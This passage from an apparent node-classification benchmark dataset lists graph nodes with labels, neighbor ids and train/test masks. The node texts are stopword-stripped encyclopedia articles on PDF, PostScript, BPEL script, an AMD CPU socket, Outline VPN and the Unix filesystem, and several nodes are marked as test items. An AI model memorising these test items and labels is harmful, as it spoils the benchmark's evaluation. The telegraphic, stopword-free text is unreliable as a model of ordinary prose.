    "text": "BPEL_script:bpel script bpelscript language specify bpel processes provides compact syntax inspired scripting languages javascript ruby full coverage features provided bpel business process execution language bpel xml-based language specify business processes intention act central controller business process provides standardized way programming large service-oriented world soa bpel programming language graphical representation mappings graphical languages business process modeling notation bpmn bpel available programmers familiar syntax like java c ... disregarded therefore especially prototyping teaching would nice programming language omits xml-overhead bpel offers features bpel one option force programmers learn completely new syntax option introduce new syntax bpel therefore bpel simplified syntax called simpel recommended apache ode group referring mix options however simpel equivalent bpel aims specifying business processes order come easy scripting syntax bpelscript introduced referring second option bpelscript forks directly simpel aiming big closeness bpel contrast simpel bpelscript supports bpels constructs including correlation bpelscript provides",
    "neighbors": [
      2501,
      3462,
      8262,
      4107,
      5677,
      9245,
      4979,
      9780,
      6079,
      2045,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8627,
    "label": 9,
    "text": "PDF:pdf portable document format pdf redundantly pdf format file format developed adobe 1990s present documents including text formatting images manner independent application software hardware operating systems based postscript language pdf file encapsulates complete description fixed-layout flat document including text fonts vector graphics raster images information needed display pdf standardized iso 32000 2008 longer requires royalties implementation today pdf files may contain variety content besides flat text graphics including logical structuring elements interactive elements annotations form-fields layers rich media including video content three dimensional objects using u3d prc various data formats pdf specification also provides encryption digital signatures file attachments metadata enable workflows requiring features adobe systems made pdf specification available free charge 1993 early years pdf popular mainly desktop publishing workflows competed variety formats djvu envoy common ground digital paper farallon replica even adobe postscript format pdf proprietary format controlled adobe released open standard july 1 2008 published international organization standardization iso 32000-1:2008 time control specification passed iso committee volunteer industry experts 2008 adobe published public patent license iso 32000-1 granting royalty-free rights patents owned adobe necessary make use sell distribute pdf compliant implementations pdf 1.7 sixth edition pdf specification became iso 32000-1 includes proprietary technologies defined adobe adobe xml forms architecture xfa javascript extension acrobat referenced iso 32000-1 normative indispensable full implementation iso 32000-1 specification proprietary technologies standardized specification published adobe ’ website many also supported popular third-party implementations pdf july 28 2017 iso 32000-2:2017 pdf 2.0 published iso 32000-2 include proprietary technologies normative references pdf combines three technologies postscript page description language run interpreter generate image process requiring many resources handle graphics standard features programming languages codice_1 codice_2 commands pdf largely based postscript simplified remove flow control features like graphics commands codice_3 remain often postscript-like pdf code generated source postscript file graphics commands output postscript code collected tokenized files graphics fonts document refers also collected everything compressed single file therefore entire postscript world fonts layout measurements remains intact document format pdf several advantages postscript pdf file 7-bit ascii file except certain elements may binary content pdf file starts header containing magic number version format codice_4 format subset cos carousel object structure format cos tree file consists primarily objects eight types furthermore may comments introduced percent sign codice_9 comments may contain 8-bit characters objects may either direct embedded another object indirect indirect objects numbered object number generation number defined codice_10 codice_11 keywords index table also called cross-reference table marked codice_12 keyword follows main body gives byte offset indirect object start file design allows efficient random access objects file also allows small changes made without rewriting entire file incremental update beginning pdf version 1.5 indirect objects may also located special streams known object streams technique reduces size files large numbers small indirect objects especially useful tagged pdf end pdf file trailer introduced codice_13 keyword contains dictionary contains two layouts pdf files non-linear optimized linear optimized non-linear pdf files consume less disk space linear counterparts though slower access portions data required assemble pages document scattered throughout pdf file linear pdf files also called optimized web optimized pdf files constructed manner enables read web browser plugin without waiting entire file download since written disk linear page order fashion pdf files may optimized using adobe acrobat software qpdf basic design graphics represented pdf similar postscript except use transparency added pdf 1.4 pdf graphics use device-independent cartesian coordinate system describe surface page pdf page description use matrix scale rotate skew graphical elements key concept pdf graphics state collection graphical parameters may changed saved restored page description pdf version 1.6 24 graphics state properties important postscript vector graphics pdf constructed paths paths usually composed lines cubic bézier curves also constructed outlines text unlike postscript pdf allow single path mix text outlines lines curves paths stroked filled clipping strokes fills use color set graphics state including patterns pdf supports several types patterns simplest tiling pattern piece artwork specified drawn repeatedly may colored tiling pattern colors specified pattern object uncolored tiling pattern defers color specification time pattern drawn beginning pdf 1.3 also shading pattern draws continuously varying colors seven types shading pattern simplest axial shade type 2 radial shade type 3 raster images pdf called image xobjects represented dictionaries associated stream dictionary describes properties image stream contains image data less commonly raster image may embedded directly page description inline image images typically filtered compression purposes image filters supported pdf include general purpose filters normally image content pdf embedded file pdf allows image data stored external files use external streams alternate images standardized subsets pdf including pdf/a pdf/x prohibit features text pdf represented text elements page content streams text element specifies characters drawn certain positions characters specified using encoding selected font resource font object pdf description digital typeface may either describe characteristics typeface may include embedded font file latter case called embedded font former called unembedded font font files may embedded based widely used standard digital font formats type 1 compressed variant cff truetype beginning pdf 1.6 opentype additionally pdf supports type 3 variant components font described pdf graphic operators fourteen typefaces known standard 14 fonts special significance pdf documents fonts sometimes called base fourteen fonts fonts suitable substitute fonts metrics available pdf readers guaranteed available reader may display correctly system installed fonts may substituted embedded pdf within text strings characters shown using character codes integers map glyphs current font using encoding number predefined encodings including winansi macroman large number encodings east asian languages font built-in encoding although winansi macroman encodings derived historical properties windows macintosh operating systems fonts using encodings work equally well platform pdf specify predefined encoding use font built-in encoding provide lookup table differences predefined built-in encoding recommended truetype fonts encoding mechanisms pdf designed type 1 fonts rules applying truetype fonts complex large fonts fonts non-standard glyphs special encodings identity-h horizontal writing identity-v vertical used fonts necessary provide tounicode table semantic information characters preserved original imaging model pdf like postscript opaque object drawn page completely replaced anything previously marked location pdf 1.4 imaging model extended allow transparency transparency used new objects interact previously marked objects produce blending effects addition transparency pdf done means new extensions designed ignored products written pdf 1.3 earlier specifications result files use small amount transparency might view acceptably older viewers files making extensive use transparency could viewed incorrectly older viewer without warning transparency extensions based key concepts transparency groups blending modes shape alpha model closely aligned features adobe illustrator version 9 blend modes based used adobe photoshop time pdf 1.4 specification published formulas calculating blend modes kept secret adobe since published concept transparency group pdf specification independent existing notions group layer applications adobe illustrator groupings reflect logical relationships among objects meaningful editing objects part imaging model pdf files may contain interactive elements annotations form fields video 3d rich media rich media pdf pdf file including interactive content embedded linked within file interactive forms mechanism add forms pdf file format pdf currently supports two different methods integrating data pdf forms formats today coexist pdf specification acroforms introduced pdf 1.2 format acroforms permit using objects e.g text boxes radio buttons etc code e.g javascript alongside standard pdf action types interactive forms acroforms support submitting resetting importing data submit action transmits names values selected interactive form fields specified uniform resource locator url interactive form field names values may submitted following formats depending settings action ’ exportformat submitpdf xfdf flags acroforms keep form field values external stand-alone files containing key value pairs external files may use forms data format fdf xml forms data format xfdf files usage rights ur signatures define rights import form data files fdf xfdf text csv/tsv formats export form data files fdf xfdf formats forms data format fdf based pdf uses syntax essentially file structure much simpler pdf since body fdf document consists one required object forms data format defined pdf specification since pdf 1.2 forms data format used submitting form data server receiving response incorporating interactive form also used export form data stand-alone files imported back corresponding pdf interactive form xml forms data format xfdf xml version forms data format xfdf implements subset fdf containing forms annotations xfdf equivalents entries fdf dictionary – status encoding javascript pages keys embeddedfdfs differences target addition xfdf allow spawning addition new pages based given data done using fdf file xfdf specification referenced included pdf 1.5 specification later versions described separately xml forms data format specification pdf 1.4 specification allowed form submissions xml format replaced submissions xfdf format pdf 1.5 specification xfdf conforms xml standard december 2016 xfdf 3.0 iso/iec standard formal name iso 19444-1:2016 – document management – xml forms data format – part 1 use iso 32000-2 xfdf 3.0 standard normative reference iso 32000-2 xfdf used way fdf e.g. form data submitted server modifications made sent back new form data imported interactive form also used export form data stand-alone files imported back corresponding pdf interactive form pdf 1.5 adobe systems introduced proprietary format forms adobe xml forms architecture xfa adobe xfa forms compatible iso 32000 acroforms feature pdf processors handle xfa content xfa specification referenced iso 32000-1 pdf 1.7 external proprietary specification entirely deprecated pdf iso 32000-2 pdf 2.0 tagged pdf see clause 14.8 iso 32000 includes document structure semantics information enable reliable text extraction accessibility technically speaking tagged pdf stylized use format builds logical structure framework introduced pdf 1.3 tagged pdf defines set standard structure types attributes allow page content text graphics images extracted reused purposes tagged pdf required situations pdf file intended print since feature optional since rules tagged pdf relatively vague iso 32000-1 support tagged pdf amongst consuming devices including assistive technology uneven time iso 32000-2 however includes improved discussion tagged pdf anticipated facilitate iso-standardized subset pdf specifically targeted accessibility pdf/ua first published 2012 introduction pdf version 1.5 2003 came concept layers layers formally known optional content groups ocgs refer sections content pdf document selectively viewed hidden document authors consumers capability useful cad drawings layered artwork maps multi-language documents etc basically consists optional content properties dictionary added document root dictionary contains array optional content groups ocgs describing set information may individually displayed suppressed plus set optional content configuration dictionaries give status displayed suppressed given ocgs pdf file may encrypted security digitally signed authentication however since sha-1 collision discovered making use pdf format digital signatures using sha-1 shown insecure standard security provided acrobat pdf consists two different methods two different passwords user password encrypts file prevents opening owner password specifies operations restricted even document decrypted include modifying printing copying text graphics document adding modifying text notes acroform fields user password encrypts file owner password instead relying client software respect restrictions owner password easily removed software including free online services thus use restrictions document author places pdf document secure assured file distributed warning displayed applying restrictions using adobe acrobat software create edit pdf files even without removing password freeware open source pdf readers ignore permission protections allow user print make copy excerpts text document limited password protection number commercial solutions offer robust means information rights management restrict document access also reliably enforce permissions ways standard security handler beginning pdf 1.5 usage rights ur signatures used enable additional interactive features available default particular pdf viewer application signature used validate permissions granted bona fide granting authority example used allow user example adobe systems grants permissions enable additional features adobe reader using public-key cryptography adobe reader verifies signature uses certificate adobe-authorized certificate authority pdf application use mechanism purposes pdf files file attachments processors may access open save local filesystem pdf files contain two types metadata first document information dictionary set key/value fields author title subject creation update dates stored optional info trailer file small set fields defined extended additional text values required method deprecated pdf 2.0 pdf 1.4 support added metadata streams using extensible metadata platform xmp add xml standards-based extensible metadata used file formats allows metadata attached stream document information embedded illustrations well whole document attaching document catalog using extensible schema pdfs may encrypted password needed view edit contents pdf 2.0 defines 256-bit aes encryption standard pdf 2.0 files pdf reference also defines ways third parties define encryption systems pdf pdf files may digitally signed complete details implementing digital signatures pdf provided iso 32000-2 pdf files may also contain embedded drm restrictions provide controls limit copying editing printing restrictions depend reader software obey security provide limited pdf documents contain display settings including page display layout zoom level adobe reader uses settings override user default settings opening document free adobe reader remove settings anyone may create applications read write pdf files without pay royalties adobe systems adobe holds patents pdf licenses royalty-free use developing software complying pdf specification pdf files created specifically accessible disabled people pdf file formats use include tags text equivalents captions audio descriptions software automatically produce tagged pdfs feature always enabled default leading screen readers including jaws window-eyes hal kurzweil 1000 3000 read tagged pdf moreover tagged pdfs re-flowed magnified readers visual impairments adding tags older pdfs generated scanned documents present challenges one significant challenges pdf accessibility pdf documents three distinct views depending document creation inconsistent three views physical view ii tags view iii content view physical view displayed printed people consider pdf document tags view screen readers assistive technologies use deliver high-quality navigation reading experience users disabilities content view based physical order objects within pdf content stream may displayed software fully support tags view reflow feature adobe reader pdf/ua international standard accessible pdf based iso 32000-1 first published iso 14289-1 2012 establishes normative language accessible pdf technology pdf attachments carrying viruses first discovered 2001 virus named outlook.pdfworm peachy uses microsoft outlook send attachment adobe pdf file activated adobe acrobat acrobat reader time time new vulnerabilities discovered various versions adobe reader prompting company issue security fixes pdf readers also susceptible one aggravating factor pdf reader configured start automatically web page embedded pdf file providing vector attack malicious web page contains infected pdf file takes advantage vulnerability pdf reader system may compromised even browser secure vulnerabilities result pdf standard allowing pdf documents scripted javascript disabling javascript execution pdf reader help mitigate future exploits although protect exploits parts pdf viewing software security experts say javascript essential pdf reader security benefit comes disabling javascript outweighs compatibility issues caused one way avoiding pdf file exploits local web service convert files another format viewing march 30 2010 security researcher didier stevens reported adobe reader foxit reader exploit runs malicious executable user allows launch asked pdf file often combination vector graphics text bitmap graphics basic types content pdf later pdf revisions pdf document also support links inside document web page forms javascript initially available plugin acrobat 3.0 types embedded contents handled using plug-ins pdf 1.6 supports interactive 3d documents embedded pdf – 3d drawings embedded using u3d prc various data formats two pdf files look similar computer screen may different sizes example high resolution raster image takes space low resolution one typically higher resolution needed printing documents displaying screen things may increase size file embedding full fonts especially asiatic scripts storing text graphics pdf viewers generally provided free charge many versions available variety sources many software options creating pdfs including pdf printing capabilities built macos ios linux distributions libreoffice microsoft office 2007 updated sp2 later wordperfect 9 scribus numerous pdf print drivers microsoft windows pdftex typesetting system docbook pdf tools applications developed around ghostscript adobe acrobat well adobe indesign adobe framemaker adobe illustrator adobe photoshop google online office suite google docs also allows uploading saving pdf raster image processors rips used convert pdf files raster format suitable imaging onto paper media printers digital production presses prepress process known rasterisation rips capable processing pdf directly include adobe pdf print engine adobe systems jaws harlequin rip global graphics documents saved pdf portable document format portable document format archiving forms data format printable document could converted back forth many formats etc companies adobe acrobat provide sdk libraries developers add create pdf features software besides adobe pdf library companies pdftron systems apache pdfbox foxit software provide similar sdks adobe acrobat one example proprietary software allows user annotate highlight add notes already created pdf files one unix application available free software gnu general public license pdfedit freeware foxit reader available microsoft windows macos linux allows annotating documents tracker software pdf-xchange viewer allows annotations markups without restrictions freeware alternative apple macos integrated pdf viewer preview also enable annotations open source software skim latter supporting interaction latex synctex pdfsync integration bibdesk reference management software freeware qiqqa create annotation report summarizes annotations notes one made across library pdfs also web annotation systems support annotation pdf documents formats cases pdfs expected functionality paper documents ink annotation required examples pdf software online services including scribd viewing storing pdfvue online editing thinkfree zamzar conversion 1993 jaws raster image processor global graphics became first shipping prepress rip interpreted pdf natively without conversion another format company released upgrade harlequin rip capability 1997 agfa-gevaert introduced shipped apogee first prepress workflow system based pdf 1997 many commercial offset printers accepted submission press-ready pdf files print source specifically pdf/x-1a subset variations submission press-ready pdf files replacement problematic need receiving collected native working files pdf selected native metafile format mac os x replacing pict format earlier classic mac os imaging model quartz graphics layer based model common display postscript pdf leading nickname display pdf preview application display pdf files version 2.0 later safari web browser system-level support pdf allows mac os x applications create pdf documents automatically provided support os-standard printing architecture files exported pdf 1.3 format according file header taking screenshot mac os x versions 10.0 10.3 image also captured pdf later versions save screen captures png file though behaviour set back pdf desired 2006 pdf widely accepted standard print job format open source development labs printing summit supported print job format common unix printing system desktop application projects gnome kde firefox thunderbird libreoffice openoffice switched emit print jobs pdf desktop printers also support direct pdf printing interpret pdf data without external help currently pdf capable printers also support postscript postscript printers support direct pdf printing free software foundation thought one high priority projects developing free high-quality fully functional set libraries programs implement pdf file format associated technologies iso 32000 standard 2011 however gnu pdf project removed list high priority projects due maturation poppler library enjoyed wider use applications evince gnome desktop environment poppler based xpdf code base also commercial development libraries available listed list pdf software apache pdfbox project apache software foundation open source java library working pdf documents pdfbox licensed apache license",
    "neighbors": [
      5635,
      11268,
      2567,
      9,
      10761,
      4111,
      3088,
      9744,
      8725,
      3097,
      11291,
      5149,
      9245,
      9763,
      1066,
      10284,
      46,
      7217,
      9780,
      7733,
      3126,
      1079,
      1593,
      1083,
      8763,
      9790,
      576,
      1089,
      3142,
      8262,
      73,
      1610,
      10838,
      6747,
      10844,
      11360,
      10337,
      618,
      3691,
      10352,
      113,
      9330,
      115,
      2676,
      1654,
      3711,
      2687,
      132,
      5764,
      1162,
      6797,
      9359,
      658,
      1171,
      1173,
      8341,
      8854,
      11418,
      2206,
      11425,
      169,
      10413,
      5300,
      8886,
      5816,
      7354,
      1723,
      4798,
      9408,
      1729,
      196,
      3270,
      8904,
      9418,
      4299,
      10957,
      6863,
      2258,
      10962,
      8408,
      8921,
      1755,
      8413,
      5857,
      3300,
      8421,
      4326,
      7399,
      8426,
      5869,
      9970,
      3828,
      4855,
      2298,
      251,
      7422,
      6915,
      6408,
      1811,
      5907,
      1302,
      11030,
      11036,
      1822,
      9506,
      5413,
      5415,
      10536,
      6954,
      3371,
      302,
      7983,
      11056,
      2865,
      823,
      9528,
      8509,
      6977,
      11074,
      1347,
      2886,
      1353,
      5450,
      8011,
      8524,
      3921,
      7507,
      9556,
      1366,
      2904,
      345,
      10588,
      4957,
      4446,
      3948,
      3447,
      4984,
      7034,
      2939,
      4481,
      1411,
      3462,
      9097,
      6539,
      9100,
      3469,
      11659,
      3988,
      9109,
      6557,
      2462,
      10143,
      420,
      4011,
      1452,
      5549,
      2990,
      9648,
      8628,
      5048,
      2501,
      7626,
      4561,
      9170,
      9683,
      5078,
      10712,
      9177,
      987,
      7643,
      10715,
      479,
      4064,
      2018,
      8674,
      1509,
      11237,
      4583,
      9708,
      5614,
      1010,
      5619,
      9714,
      7161,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 8628,
    "label": 9,
    "text": "PostScript:postscript postscript ps page description language electronic publishing desktop publishing business dynamically typed concatenative programming language created adobe systems john warnock charles geschke doug brotz ed taft bill paxton 1982 1984 concepts postscript language seeded 1966 john warnock working evans sutherland computer graphics company time warnock developing interpreter large three-dimensional graphics database new york harbor warnock conceived design system language process graphics concurrently researchers xerox parc developed first laser printer recognized need standard means defining page images 1975-76 bob sproull william newman developed press format eventually used xerox star system drive laser printers press data format rather language lacked flexibility parc mounted interpress effort create successor 1978 warnock left evans sutherland joined xerox parc work martin newell rewrote design system create interpretive language j jam john martin used vlsi design investigation type graphics printing work later evolved expanded interpress language warnock left chuck geschke founded adobe systems december 1982 together doug brotz ed taft bill paxton created simpler language similar interpress called postscript went market 1984 time visited steve jobs urged adapt postscript used language driving laser printers march 1985 apple laserwriter first printer ship postscript sparking desktop publishing dtp revolution mid-1980s combination technical merits widespread availability made postscript language choice graphical output printing applications time interpreter sometimes referred rip raster image processor postscript language common component laser printers 1990s however cost implementation high computers output raw ps code would interpreted printer raster image printer natural resolution required high performance microprocessors ample memory laserwriter used 12 mhz motorola 68000 making faster macintosh computers attached laser printer engines cost thousand dollars added cost ps marginal printer mechanisms fell price cost implementing ps became great fraction overall printer cost addition desktop computers becoming powerful longer made sense offload rasterisation work onto resource-constrained printer 2001 lower-end printer models came support postscript largely due growing competition much cheaper non-postscript ink jet printers new software-based methods render postscript images computer making suitable printer pdf descendant postscript provides one method largely replaced postscript de facto standard electronic document distribution high-end printers postscript processors remain common use dramatically reduce cpu work involved printing documents transferring work rendering postscript images computer printer first version postscript language released market 1984 suffix level 1 added level 2 introduced postscript level 2 introduced 1991 included several improvements improved speed reliability support in-rip separations image decompression example jpeg images could rendered postscript program support composite fonts form mechanism caching reusable content postscript 3 adobe dropped level terminology favor simple versioning came end 1997 along many new dictionary-based versions older operators introduced better color handling new filters allow in-program compression/decompression program chunking advanced error-handling postscript 3 significant terms replacing existing proprietary color electronic prepress systems widely used magazine production introduction smooth shading operations 4096 shades grey rather 256 available postscript level 2 well devicen color space allowed addition additional ink colors called spot colors composite color pages prior introduction postscript printers designed print character output given text—typically ascii—as input number technologies task shared property glyphs physically difficult change stamped onto typewriter keys bands metal optical plates changed degree increasing popularity dot matrix printers characters systems drawn series dots defined font table inside printer grew sophistication dot matrix printers started including several built-in fonts user could select models allowed users upload custom glyphs printer dot matrix printers also introduced ability print raster graphics graphics interpreted computer sent series dots printer using series escape sequences printer control languages varied printer printer requiring program authors create numerous drivers vector graphics printing left special-purpose devices called plotters almost plotters shared common command language hpgl limited use anything printing graphics addition tended expensive slow thus rare laser printers combine best features printers plotters like plotters laser printers offer high quality line art like dot-matrix printers able generate pages text raster graphics unlike either printers plotters laser printer makes possible position high-quality graphics text page postscript made possible exploit fully characteristics offering single control language could used brand printer postscript went beyond typical printer control language complete programming language many applications transform document postscript program execution results original document program sent interpreter printer results printed document one inside another application display document on-screen since document-program regardless destination called device-independent postscript noteworthy implementing 'on-the fly rasterization everything even text specified terms straight lines cubic bézier curves previously found cad applications allows arbitrary scaling rotating transformations postscript program interpreted interpreter converts instructions dots needed form output reason postscript interpreters occasionally called postscript raster image processors rips almost complex postscript handling fonts font system uses ps graphics primitives draw glyphs curves rendered resolution number typographic issues considered approach one issue fonts scale linearly small sizes features glyphs become proportionally large small start look displeasing postscript avoided problem inclusion font hinting additional information provided horizontal vertical bands help identify features letter important rasterizer maintain result significantly better-looking fonts even low resolution formerly believed hand-tuned bitmap fonts required task time technology including hints fonts carefully guarded hinted fonts compressed encrypted adobe called type 1 font also known postscript type 1 font ps1 t1 adobe type 1 type 1 effectively simplification ps system store outline information opposed complete language pdf similar regard adobe would sell licenses type 1 technology wanting add hints fonts license technology left type 3 font also known postscript type 3 font ps3 t3 type 3 fonts allowed sophistication postscript language without standardized approach hinting type 2 font format designed used compact font format cff charstrings implemented reduce overall font file size cff/type2 format later became basis handling postscript outlines opentype fonts cid-keyed font format also designed solve problems ocf/type 0 fonts addressing complex asian-language cjk encoding large character set issues cid-keyed font format used type 1 font format standard cid-keyed fonts type 2 cid-keyed opentype fonts compete adobe system apple designed system truetype around 1991 immediately following announcement truetype adobe published specification type 1 font format retail tools altsys fontographer acquired macromedia january 1995 owned fontlab since may 2005 added ability create type 1 fonts since many free type 1 fonts released instance fonts used tex typesetting system available format early 1990s several systems storing outline-based fonts developed bitstream metafont instance none included general-purpose printing solution therefore widely used late 1990s adobe joined microsoft developing opentype essentially functional superset type 1 truetype formats printed postscript output device unneeded parts opentype font omitted sent device driver would truetype type 1 font depending kind outlines present opentype font 1980s adobe drew revenue licensing fees implementation postscript printers known raster image processor rip number new risc-based platforms became available mid-1980s found adobe support new machines lacking issues cost led third-party implementations postscript becoming common particularly low-cost printers licensing fee sticking point high-end typesetting equipment quest speed demanded support new platforms faster adobe could provide one point microsoft licensed apple postscript-compatible interpreter bought called trueimage apple licensed microsoft new font format truetype apple ended reaching accord adobe licensed genuine postscript printers truetype became standard outline font technology windows macintosh today third-party postscript-compatible interpreters widely used printers multifunction peripherals mfps example csr plc ips ps3 interpreter formerly known phoenixpage standard many printers mfps including developed hewlett-packard sold laserjet color laserjet lines third-party postscript solutions used print mfp manufacturers include jaws harlequin rip global graphics free software version several applications ghostscript several compatible interpreters listed undocumented printing wiki basic inexpensive laser printers support postscript instead coming drivers simply rasterize platform native graphics formats rather converting postscript first postscript support needed printer ghostscript used also number commercial postscript interpreters teletype co. t-script postscript became commercially successful due introduction graphical user interface gui allowing designers directly lay pages eventual output laser printers however gui graphics systems generally much less sophisticated postscript apple quickdraw instance supported basic lines arcs complex b-splines advanced region filling options postscript order take full advantage postscript printing applications computers re-implement features using host platform graphics system led numerous issues on-screen layout would exactly match printed output due differences implementation features computer power grew became possible host ps system computer rather printer led natural evolution ps printing system one could also used host graphics language numerous advantages approach help eliminate possibility different output screen printer also provided powerful graphics system computer allowed printers dumb time cost laser engines falling production setting using postscript display system meant host computer could render low-resolution screen higher resolution printer simply send ps code smart printer offboard printing however postscript written printing mind numerous features made unsuitable direct use interactive display system particular ps based idea collecting ps commands codice_1 command seen point commands read point interpreted output interactive system clearly appropriate ps sort interactivity built example supporting hit detection mouse interactivity obviously apply ps used printer steve jobs left apple started next pitched adobe idea using ps display system new workstation computers result display postscript dps dps added basic functionality improve performance changing many string lookups 32 bit integers adding support direct output every command adding functions allow gui inspect diagram additionally set bindings provided allow ps code called directly c programming language next used bindings nextstep system provide object oriented graphics system although dps written conjunction next adobe sold commercially common feature unix workstations 1990s sun microsystems took another approach creating news instead dps concept allowing ps interact c programs news instead extended ps language suitable running entire gui computer sun added number new commands timers mouse control interrupts systems needed interactivity added data structures language elements allow completely object oriented internally complete gui three fact written news provided time workstations however ongoing efforts standardize x11 system led introduction widespread use sun systems news never became widely used postscript turing-complete programming language belonging concatenative group typically postscript programs produced humans programs however possible write computer programs postscript like programming language postscript interpreted stack-based language similar forth strong dynamic typing data structures inspired found lisp scoped memory since language level 2 garbage collection language syntax uses reverse polish notation makes order operations unambiguous reading program requires practice one keep layout stack mind operators languages term functions take arguments stack place results onto stack literals example numbers effect placing copy stack sophisticated data structures built array dictionary types declared type system sees arrays dictionaries typing discipline applied user-defined types left code implements character used introduce comments postscript programs general convention every postscript program start characters ps interpreter directive devices properly interpret postscript hello world program customary way show small example complete program given language might look like postscript level 2 output device console postscript uses point unit length however unlike versions point postscript uses exactly 72 points inch thus example order draw vertical line 4 cm length sufficient type readably idiomatically one might use following equivalent demonstrates simple procedure definition use mathematical operators codice_2 codice_3 implementations postscript use single-precision reals 24-bit mantissa meaningful use 9 decimal digits specify real number performing calculations may produce unacceptable round-off errors list software used render postscript documents",
    "neighbors": [
      6146,
      2567,
      9,
      11291,
      6693,
      10280,
      9258,
      3126,
      8763,
      9790,
      9795,
      8262,
      73,
      1609,
      9827,
      7269,
      618,
      623,
      8303,
      113,
      8304,
      8815,
      10352,
      1654,
      11385,
      7806,
      2687,
      9345,
      10885,
      1162,
      1173,
      8860,
      3742,
      1184,
      6822,
      7849,
      6830,
      2741,
      8894,
      9926,
      9418,
      6863,
      10960,
      4836,
      7398,
      6377,
      2282,
      5354,
      5363,
      3828,
      7422,
      2304,
      5384,
      6408,
      10510,
      8977,
      5395,
      5907,
      7444,
      10012,
      1822,
      8479,
      10536,
      6954,
      9528,
      6970,
      6973,
      3904,
      8000,
      11074,
      1347,
      8516,
      2886,
      1865,
      3921,
      6993,
      1877,
      10588,
      350,
      6502,
      9575,
      11625,
      10097,
      5492,
      5494,
      7034,
      4481,
      3974,
      9097,
      9100,
      3469,
      5521,
      10650,
      11171,
      2981,
      11694,
      8627,
      5048,
      9665,
      963,
      7626,
      2513,
      9170,
      9683,
      11219,
      6102,
      7640,
      7643,
      4064,
      9700,
      11237,
      9192,
      3563,
      8179,
      502,
      7161
    ],
    "mask": "Test"
  },
  {
    "node_id": 8629,
    "label": 3,
    "text": "Socket_AM3:socket am3 socket am3 cpu socket amd processors am3 launched february 9 2009 successor socket am2+ alongside initial grouping phenom ii processors designed sole principal change am2+ am3 support ddr3 sdram like previous amd socket am3 processor functional data sheet amd document number 40778 made publicly available family 10h amd phenom™ processor product data sheet document 446878 contains brief list features phenom contain substantive technical data regarding socket am3 socket am3 breaks compatibility am2/am2+ processors due subtle change key placement am3 socket 941 pin contacts different layout am2+ processors 940 pins tom hardware removed two obstructing key pins am2+ phenom processor order fit am3 socket processor work am3 socket still worked am2+ socket suggesting compatibility issues run deeper merely key pins likely built-in memory controller am2/am2+ processors supports ddr2 unlike am3 processors support ddr2 ddr3 memory fact motherboards manufactured supported ddr2 ddr3 however one type could used time despite using am3 socket despite using northbridge southbridge found am3 motherboards support am2 am2+ am3 processor am3 processors also support ddr2 backwards-compatible socket am2/am2+ contingent upon bios update motherboard manufacturers including asus gigabyte others labeled existing am2/am2+ boards am3 ready similar indicating bios support provided specified boards allows existing am2/am2+ systems upgrade cpu without upgrade components 4 holes fastening heatsink motherboard placed rectangle lateral lengths 48 mm 96 mm amd sockets socket am2 socket am2+ socket am3 socket am3+ socket fm2 cooling solutions therefore interchangeable am3+ modification am3 socket one additional pin new bulldozer-based am3+ processors backwards-compatible am3 processors broke backwards-compatibility am3+ processors am2 am2+ motherboards processors support ddr2 memory",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      7058,
      10260,
      4246,
      8090,
      7963,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      4451,
      5859,
      8035,
      1515,
      1260,
      7788,
      7151,
      1776,
      1137,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 8630,
    "label": 4,
    "text": "Outline_VPN:outline vpn outline vpn free open-source tool deploys shadowsocks servers multiple cloud service providers software suite also includes client software multiple platforms outline developed jigsaw technology incubator created google outline server supports self-hosting well cloud service providers including digitalocean rackspace google cloud platform amazon ec2 installation involves running command command line interface case installing digitalocean graphical user interface outline three main components outline uses shadowsocks protocol communication client server traffic encrypted ietf chacha20 stream cipher 256-bit key authenticated ietf poly1305 authenticator outline free open-source licensed apache license 2.0 audited radically open security claims log users ’ web traffic outline server supports unattended upgrades outline anonymity tool n't provide degree anonymity protections tor routes traffic three hops rather one also protects attacks like browser fingerprinting march 2018 max eddy pcmag stated preview version outline vpn startlingly easy use removes privacy concerns associated vpn companies however eddy criticized software encrypting traffic windows warned users individual use may lack anonymity compared large vpn companies since version 1.2 outline windows client came 'beta effectively beginning encrypt traffic device par outline clients macos chrome os android ios",
    "neighbors": [
      4224,
      5254,
      138,
      4490,
      6797,
      1692,
      9117,
      3625,
      5677,
      7983,
      823,
      11319,
      8640,
      3777,
      2884,
      3781,
      4194,
      8674,
      2661,
      10341,
      3688,
      9193,
      5612,
      10991,
      4725,
      5749,
      7292,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 8631,
    "label": 6,
    "text": "Unix_filesystem:unix filesystem unix operating systems inspired file system considered central component operating system also one first parts system designed implemented ken thompson first experimental version unix dated 1969 operating systems filesystem provides information storage retrieval one several forms interprocess communication many small programs traditionally form unix system store information files programs read although pipes complemented role starting third edition also filesystem provides access resources so-called device files entry points terminals printers mice rest article uses unix generic name refer original unix operating system many workalikes filesystem appears one rooted tree directories instead addressing separate volumes disk partitions removable media network shares separate trees done dos windows drive drive letter denotes root file system tree volumes mounted directory causing volume file system tree appear directory larger tree root entire tree denoted codice_1 original bell labs unix two-disk setup customary first disk contained startup programs second contained users files programs second disk mounted empty directory named codice_2 first disk causing two disks appear one filesystem second disks contents viewable codice_3 unix directories contain files instead contain names files paired references so-called inodes turn contain file metadata owner permissions time last access etc. name multiple names file system may refer file feature termed hard link mathematical traits hard links make file system limited type directed acyclic graph although directories still form tree typically may hard-linked originally envisioned 1969 unix file system would fact used general graph hard links directories providing navigation instead path names original unix file system supported three types files ordinary files directories special files also termed device files berkeley software distribution bsd system v added file type used interprocess communication bsd added sockets system v added fifo files bsd also added symbolic links often termed symlinks range file types files refer files complement hard links symlinks modeled similar feature multics differ hard links may span filesystems existence independent target object unix systems may support additional types files certain conventions exist locating kinds files programs system configuration files users home directories first documented codice_4 man page since version 7 unix subsequent versions derivatives clones typically similar man page details directory layout varied time although file system layout part single unix specification several attempts exist standardize parts system v application binary interface intel binary compatibility standard common operating system environment linux foundation filesystem hierarchy standard fhs generalized overview common locations files unix operating system",
    "neighbors": [
      5120,
      6669,
      3598,
      10257,
      7188,
      6677,
      5142,
      8214,
      9762,
      5158,
      5179,
      11323,
      8772,
      9298,
      4708,
      8298,
      9836,
      7789,
      6772,
      9333,
      6263,
      9335,
      9343,
      7818,
